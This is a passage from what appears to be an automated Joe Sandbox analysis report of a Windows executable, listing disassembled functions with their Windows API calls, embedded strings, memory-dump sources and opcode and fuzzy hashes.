GetMenuItemID.USER32(?,00000000), ref: 0046264B
GetMenuItemID.USER32(?,-00000001), ref: 00462675
GetMenuItemID.USER32(?,?), ref: 004626BA
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00462700
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00462714
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00462735

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: b0f46b9daa1905a6cfa597ce9f08befe4fcaea4ae8b00d429bdca1168be675da
Instruction ID: d041e2a6511ad081bd824cff42eca7b157938f8ca15e77e0b80393dec237999e
Opcode Fuzzy Hash: b0f46b9daa1905a6cfa597ce9f08befe4fcaea4ae8b00d429bdca1168be675da
Instruction Fuzzy Hash: 3361B470900A49BFDB11CF64CE84DBF7BB8FB01345F14046AE842A7251E7B9AD05DB2A

Function 00486F23 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00486FA5
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00486FA8
GetWindowLongW.USER32(?,000000F0), ref: 00486FCC
_memset.LIBCMT ref: 00486FDD
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00486FEF
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00487067

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: 4336d240a59bbb388c973f46f1178136a6457c7e14c292988be6c5ed4532a5ee
Instruction ID: 7132dcb9391edd1f4fca7d59f8acd98ed1f58d557d43f29f177e0b8d5bde9df6
Opcode Fuzzy Hash: 4336d240a59bbb388c973f46f1178136a6457c7e14c292988be6c5ed4532a5ee
Instruction Fuzzy Hash: 17618E75900208AFDB10EFA4CC85EEE77B8EB09700F20056AFA14A73A1C775AD51DB64

Function 00456B98 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00456BBF
SafeArrayAllocData.OLEAUT32(?), ref: 00456C18
VariantInit.OLEAUT32(?), ref: 00456C2A
SafeArrayAccessData.OLEAUT32(?,?), ref: 00456C4A
VariantCopy.OLEAUT32(?,?), ref: 00456C9D
SafeArrayUnaccessData.OLEAUT32(?), ref: 00456CB1
VariantClear.OLEAUT32(?), ref: 00456CC6
SafeArrayDestroyData.OLEAUT32(?), ref: 00456CD3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00456CDC
VariantClear.OLEAUT32(?), ref: 00456CEE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00456CF9

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: f1379b8d06b3f903a5e910e956f09b0d2a9745292c14bd0cd64e072d7f41818e
Instruction ID: 21fd5a8c16b11a42553d074c3324144f158a868588d4a73b9a3ed32873cef97c
Opcode Fuzzy Hash: f1379b8d06b3f903a5e910e956f09b0d2a9745292c14bd0cd64e072d7f41818e
Instruction Fuzzy Hash: F1418231A001199FCF00DFA9D8449AEBBB9EF18315F01847EE955E7362CB34A949CF94

Function 004783BB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC

CoInitialize.OLE32 ref: 00478403
CoUninitialize.OLE32 ref: 0047840E
CoCreateInstance.OLE32(?,00000000,00000017,00492BEC,?), ref: 0047846E
IIDFromString.OLE32(?,?), ref: 004784E1
VariantInit.OLEAUT32(?), ref: 0047857B
VariantClear.OLEAUT32(?), ref: 004785DC

Strings

NULL Pointer assignment, xrefs: 004784B3
Failed to create object, xrefs: 00478479, 0047852F
Invalid parameter, xrefs: 004784FA

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: eb63f8d69043fbd752c9a475b61fc08905a9fa1abf1737b64fd3052273e3a83e
Instruction ID: cb75df2b24e16c1c2e0b5d8d850f15e0fc33cba1d2aa6ec0deb68a9cf625d14d
Opcode Fuzzy Hash: eb63f8d69043fbd752c9a475b61fc08905a9fa1abf1737b64fd3052273e3a83e
Instruction Fuzzy Hash: AA61C170648312AFC710DF14C848B9FB7E8AF44744F00881EF9899B291DB78ED48CB9A

Function 0046B4C3 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0046B4D0
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0046B546
GetLastError.KERNEL32 ref: 0046B550
SetErrorMode.KERNEL32(00000000,READY), ref: 0046B5BD

Strings

UNKNOWN, xrefs: 0046B575
READY, xrefs: 0046B596
INVALID, xrefs: 0046B58F
NOTREADY, xrefs: 0046B57C
READONLY, xrefs: 0046B588

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: eccad1696ba090c5711fa55b6348286b496d6d94020a94e73532c489e0c9eeb3
Instruction ID: 3fb85926d1a8df40b98e85eadc692d0a6e2328ff5e483d9ffe01cb822ebdbf3c
Opcode Fuzzy Hash: eccad1696ba090c5711fa55b6348286b496d6d94020a94e73532c489e0c9eeb3
Instruction Fuzzy Hash: 29318675A00205AFCB00EB68C845AEE77B4FF45318F10416BF506D7291EB799E86CB9A

Function 00458F8F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22

Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00459014
GetDlgCtrlID.USER32 ref: 0045901F
GetParent.USER32 ref: 0045903B
SendMessageW.USER32(00000000,?,00000111,?), ref: 0045903E
GetDlgCtrlID.USER32(?), ref: 00459047
GetParent.USER32(?), ref: 00459063
SendMessageW.USER32(00000000,?,?,00000111), ref: 00459066

Strings

ListBox, xrefs: 00458FD1
ComboBox, xrefs: 00458F9C

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: 70b00899020a6935ed5be547ea879312aebc4391e40c277213c8505d4346909e
Instruction ID: 6714b25adca5f569a88cfbaafbe7bd2dd1ba81f724cd7e2599907f028ed7346a
Opcode Fuzzy Hash: 70b00899020a6935ed5be547ea879312aebc4391e40c277213c8505d4346909e
Instruction Fuzzy Hash: D021D870A00108BFDF04ABA1CC85EFEB774EF45310F10062AF911672E2DB795819DB28

Function 0045907A Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22

Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 004590FD
GetDlgCtrlID.USER32 ref: 00459108
GetParent.USER32 ref: 00459124
SendMessageW.USER32(00000000,?,00000111,?), ref: 00459127
GetDlgCtrlID.USER32(?), ref: 00459130
GetParent.USER32(?), ref: 0045914C
SendMessageW.USER32(00000000,?,?,00000111), ref: 0045914F

Strings

ListBox, xrefs: 004590BC
ComboBox, xrefs: 00459087

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: 76c298384857a0c05b8993852c86e7b1b6c4ac97cbcf8f08457efd25aebf9e7b
Instruction ID: 4d8cd3b83cca1d69534b37f7086261ba2dc9307f4c099413b547fbd15d3c7d68
Opcode Fuzzy Hash: 76c298384857a0c05b8993852c86e7b1b6c4ac97cbcf8f08457efd25aebf9e7b
Instruction Fuzzy Hash: AA21B674A00108BFDF01ABA5CC85EFEBB74EF44301F50452BB911A72A2DB795819DB29

Function 00459163 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 0045916F
GetClassNameW.USER32(00000000,?,00000100), ref: 00459184
_wcscmp.LIBCMT ref: 00459196
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00459211

Strings

SHELLDLL_DefView, xrefs: 00459190
list, xrefs: 004591F3
smallicons, xrefs: 004591D9
details, xrefs: 004591BF
largeicons, xrefs: 004591A5

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: ea2da3042022fb33e5a84bdcfd4780e66fcf499551f9b63f672fb9db9d77b33f
Instruction ID: f102ea4107ca07b1db40aa5d7e68bb0b9a0f71bc8f584d68d6a8224326f4a83e
Opcode Fuzzy Hash: ea2da3042022fb33e5a84bdcfd4780e66fcf499551f9b63f672fb9db9d77b33f
Instruction Fuzzy Hash: 3111E776248317F9FA112624EC06DAB379CAB15721F30046BFD00E40D2FEA95C56666C

Function 00479113 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 263COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00479167
VariantInit.OLEAUT32(?), ref: 00479238
VariantInit.OLEAUT32(?), ref: 00479339
VariantClear.OLEAUT32(?), ref: 00479343
VariantClear.OLEAUT32(?), ref: 004793A0

Strings

,,I, xrefs: 004791E5
Incorrect Object type in FOR..IN loop, xrefs: 0047931C
Null Object assignment in FOR..IN loop, xrefs: 004791C8, 004792F6, 004793AE

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: ,,I$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-2080382077
Opcode ID: 4876e0fe4e6e65ed2aee25e8811e5c19d6b5f5c946948c970bae7899105c18ce
Instruction ID: ae80b45066e4f78fbd037e562a23a34cf658a5e22d7790f01f39a3ab0041c2b1
Opcode Fuzzy Hash: 4876e0fe4e6e65ed2aee25e8811e5c19d6b5f5c946948c970bae7899105c18ce
Instruction Fuzzy Hash: 62919E30A00205ABDF20DFA1C848FEFB7B8EF49714F10855EE909AB281D7789D05CBA4

Function 0045A068 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,0045A439), ref: 0045A377

Strings

CLASS, xrefs: 0045A0F6
NAME, xrefs: 0045A1A9
INSTANCE, xrefs: 0045A285
TEXT, xrefs: 0045A2AE
CLASSNN, xrefs: 0045A119
REGEXPCLASS, xrefs: 0045A13C

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: ec1b2c5ef55112558705b1f2f9e35d7e0ecf4ffddfa086fd6d13dd20cc331da8
Instruction ID: 7454df241f77d0b93e78cd2df6a08ba454d4c5e8e9c0a671585cc9aba64ec447
Opcode Fuzzy Hash: ec1b2c5ef55112558705b1f2f9e35d7e0ecf4ffddfa086fd6d13dd20cc331da8
Instruction Fuzzy Hash: BA91BB70600505AADB08DF61C452BEEF774BF04305F54822FEC59A7242DB3969ADCB99

Function 00402E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00402EAE

Part of subcall function 00401DB3: GetClientRect.USER32(?,?), ref: 00401DDC
Part of subcall function 00401DB3: GetWindowRect.USER32(?,?), ref: 00401E1D
Part of subcall function 00401DB3: ScreenToClient.USER32(?,?), ref: 00401E45

GetDC.USER32 ref: 0043CD32
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0043CD45
SelectObject.GDI32(00000000,00000000), ref: 0043CD53
SelectObject.GDI32(00000000,00000000), ref: 0043CD68
ReleaseDC.USER32(?,00000000), ref: 0043CD70
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0043CDFB

Strings

U, xrefs: 0043CCD0

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 3cdb49cb97ee06b786ec44539fc98b371f27cf3cd913876941f0ba4c68568fc2
Instruction ID: a06c30b2c7428a2a0e02ce49fef1101dc5652c1e0a779c9989b3b0b616dc9c80
Opcode Fuzzy Hash: 3cdb49cb97ee06b786ec44539fc98b371f27cf3cd913876941f0ba4c68568fc2
Instruction Fuzzy Hash: 8A71CB31400205DFCF219F64C884AAB3BB5FF48324F14567BFD55AA2A6C7389881DBA9

Function 00B91A1B Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMON

Download Yara Rule

APIs

RtlDecodePointer.NTDLL(00000000), ref: 00B91A3E

Strings

pow, xrefs: 00B91B22, 00B91BCE, 00B91BE1
exp, xrefs: 00B91B03, 00B91B65
log10, xrefs: 00B91A88, 00B91AD8
acos, xrefs: 00B91BB6
log, xrefs: 00B91AE4, 00B91AF0
asin, xrefs: 00B91BAA
sqrt, xrefs: 00B91BC2

Memory Dump Source

Source File: 00000000.00000002.2247376463.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_uG3I84bQEr.jbxd

Similarity

API ID: DecodePointer
String ID: acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-3064271455
Opcode ID: fbfede862f78b4c162e12f0244f8d119e123ed2a84a860dc920b17825eb1327a
Instruction ID: 1d4c50cb48c41576833947adf5bf93690fc0244eefc98c8886e527e58e1dfe90
Opcode Fuzzy Hash: fbfede862f78b4c162e12f0244f8d119e123ed2a84a860dc920b17825eb1327a
Instruction Fuzzy Hash: 1F514971A0450BCBDF109F6CEA881ADBBF1FF4A310F2009E5E441AB264DB758E24EB54

Function 00478C46 Relevance: 13.9, APIs: 9, Instructions: 438COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,0048F910), ref: 00478D28
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0048F910), ref: 00478D5C
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00478ED6
SysFreeString.OLEAUT32(?), ref: 00478F00

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: e599abc5ccc1fcc2afa0811a74523479773a4e2d78cc03c258ebc6d435cce25a
Instruction ID: 5de9ffb64ca5e15a2b50b30bc9937a924b2564530b5861c8322637ebb6f06415
Opcode Fuzzy Hash: e599abc5ccc1fcc2afa0811a74523479773a4e2d78cc03c258ebc6d435cce25a
Instruction Fuzzy Hash: A4F12871A00109AFCB14DF94C888EEEB7B9FF49314F10846AF909AB251DB35AE46CB55

Function 00464CC1 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0046466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00463697,?), ref: 0046468B

Part of subcall function 0046466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00463697,?), ref: 004646A4

Part of subcall function 00464A31: GetFileAttributesW.KERNEL32(?,0046370B), ref: 00464A32

lstrcmpiW.KERNEL32(?,?), ref: 00464D40
_wcscmp.LIBCMT ref: 00464D5A
MoveFileW.KERNEL32(?,?), ref: 00464D75

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: 9f483328b87e2f9089392b2207326b9a11b8e00c1f4561b81bc0a43578ca8f4b
Instruction ID: 3e0d64ecfe06201b2d7f4e4ce82b19db3d94e317acadfd9fd6841a38a6d3c077
Opcode Fuzzy Hash: 9f483328b87e2f9089392b2207326b9a11b8e00c1f4561b81bc0a43578ca8f4b
Instruction Fuzzy Hash: 1D5164B25083459BCB24EFA1D8819DF73ECAF84354F40092FB289D3151EE79A589C76B

Function 00488645 Relevance: 13.7, APIs: 9, Instructions: 168COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 004886FF

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: InvalidateRect
String ID:
